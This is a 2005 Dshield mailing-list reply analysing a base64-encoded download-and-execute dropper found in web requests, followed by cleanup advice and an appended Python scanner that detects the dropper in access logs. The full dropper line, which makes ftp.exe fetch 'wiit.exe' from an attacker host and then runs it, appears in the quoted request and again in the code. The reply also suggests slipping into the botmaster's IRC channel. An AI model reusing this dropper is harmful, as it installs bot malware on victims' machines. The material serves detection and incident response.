[Dshield] Anyone seen wiit.exe?
jayjwa at atr2.ath.cx
Tue Aug 30 07:42:55 GMT 2005
On Mon, 29 Aug 2005, bgreenwood wrote:
-> Over about the past two weeks or so I have noticed the following
being base64 encoded in the URI of some incoming requests to my site...
Are you running IIS, by chance?
-> cmd /k echo open 126.96.36.199 17113 > o&echo user 1 1 >> o &echo
get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
This command is calling the interpreter to create an ftp script that is
then fed into ftp.exe. Script "o" looks like this:
open 188.8.131.52 17113
user 1 1
get wiit.exe
quit
That script downloads from the attacker, in this case 184.108.40.206
at port 17113, from a bot ftp server, the bot binary, in this case
"wiit.exe". The last command feeds the script to ftp.exe, quietly deletes
it, and runs it.
ftp -n -s:o downloads it
& del /F /Q o deletes it
& wiit.exe runs what just got downloaded
-> I have seen this activity before but with different filenames being
called out. I don't recall seeing the wiit.exe or know exactly what
it is supposed to be doing. Has anyone seen this or know what
it is supposed to be doing once executed?
C:\Windows\System32 (depending on the case of the OS)
and another reference to the file in HKLM of the registry, Run, RunOnce
and/or RunServices. There's a few others on some.
These are the download & exec commands that are sent from the attacking
machine to the new victim machine once successful exploitation has
occurred. You more than likely have a lot of irc-bot infected machines
and/or a totally compromised network, depending on how many of your
machines are doing this/taking these requests. Someone is then sitting in
an IRC channel somewhere, using these machines to DDoS, send SPAM, infect
other people's machines, harvest emails, Windows CD keys, run SOCKS4/5
Note where the machines are connecting to. Record the IP, whois and
contact point for the host(s) in question.
Shutdown the machine, boot from a clean disk to safemode or another OS
like linux and mount the disk (that is, do not let the Registry stuff
execute; as little as possible should run. If the process does start that
you think is the bot, task kill it.) Remove the referenced file. Remove
all mentions of the file from the Registry. Make sure that "System
Restore" is disabled during this. You might need to repair the hosts file.
Patch the system, firewall off the known bot/exploit ports, and IMHO
swap IIS for Apache and restart. Repeat for each machine.
Mail the contact point for the server you recorded and tell him about his
botnet. If you're feeling adventuresome, follow the path of the bots back
to the server and see if you can get into the bot channel and learn
anything about the botmaster.
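Below is an added example, not part of the original post or of the Dshield list, showing how to spot this dropper idiom in web-server logs the way a detection engineer would: each line is URL-decoded, every long base64-looking token is decoded, and the plaintext is checked for a script fed to ftp.exe via -s: with an "open <ip> <port>" and a "get <file>" line; the script that the chain of "echo ... >> o" writes is rebuilt as well, so the analyst sees what ftp.exe was handed. The access-log lines, the 192.0.2.x and 198.51.100.x addresses, and all function names are constructed for the example; the dropper command itself is the one quoted above.

```python
import base64
import re
from urllib.parse import quote, unquote

# The dropper quoted in the post: writes an ftp script "o" line by line, feeds it to
# ftp.exe, deletes it, then runs the downloaded binary.
DROPPER_CMD = ("cmd /k echo open 126.96.36.199 17113 > o&echo user 1 1 >> o &echo "
               "get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe")

# Constructed sample access-log lines (not real traffic; 192.0.2.x / 198.51.100.x are
# documentation ranges). The third carries the dropper, base64-encoded and URL-escaped
# in the query string, as it would appear in a web-server log. The second carries a
# harmless base64 token so the scanner is shown not to fire on every encoded value.
_B64 = base64.b64encode(DROPPER_CMD.encode("ascii")).decode("ascii")
SAMPLE_LOG = [
    '192.0.2.7 - - [29/Aug/2005:10:01:12 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.7 - - [29/Aug/2005:10:01:40 +0000] "GET /s?sid=QUFBQUFBQUFBQUFBQUFBQQ HTTP/1.0" 200 12',
    '198.51.100.23 - - [29/Aug/2005:10:02:03 +0000] "GET /scripts/root.exe?c='
    + quote(_B64, safe="") + ' HTTP/1.0" 404 0',
]

# Pieces of the idiom: a script handed to ftp.exe with -s:, an "open <ip> <port>" line,
# and a "get <file>" line naming the binary that will be executed afterwards.
FTP_SCRIPT_RE = re.compile(r"\bftp\b[^&|]*-s:", re.I)
OPEN_RE = re.compile(r"\bopen\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b", re.I)
GET_RE = re.compile(r"\bget\s+([\w.\-]+)", re.I)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# One "echo <text> > file" or "echo <text> >> file" fragment of the command chain.
ECHO_RE = re.compile(r"\becho\s+(.*?)\s*>>?\s*[^\s&]+", re.I)


def decode_b64_tokens(text):
    """Yield the ASCII plaintext of every long base64-looking run in text."""
    for m in B64_TOKEN_RE.finditer(text):
        token = m.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4))
            yield raw.decode("ascii")
        except ValueError:  # bad padding/length, or not printable ASCII
            continue


def parse_dropper(cmd):
    """Return {host, port, file} if cmd uses the echo-to-script / ftp -s: idiom, else None."""
    if not FTP_SCRIPT_RE.search(cmd):
        return None
    o, g = OPEN_RE.search(cmd), GET_RE.search(cmd)
    if not (o and g):
        return None
    return {"host": o.group(1), "port": int(o.group(2)), "file": g.group(1)}


def reconstruct_script(cmd):
    """Rebuild the ftp script that the chain of 'echo ... > o' / 'echo ... >> o' writes."""
    return "\n".join(m.group(1).strip() for m in ECHO_RE.finditer(cmd))


def scan_log(lines):
    """Return one record per log line that carries a base64-encoded ftp dropper."""
    hits = []
    for line in lines:
        for plain in decode_b64_tokens(unquote(line)):
            info = parse_dropper(plain)
            if info:
                hits.append({**info, "script": reconstruct_script(plain), "line": line})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"dropper: ftp {hit['host']}:{hit['port']} get {hit['file']}")
        print("  script fed to ftp.exe:")
        for row in hit["script"].splitlines():
            print("   ", row)
```

The host and port pulled out by scan_log are exactly the "where the machines are connecting to" detail the post says to record before contacting the hosting provider; the rebuilt script confirms which binary name to look for on the victim.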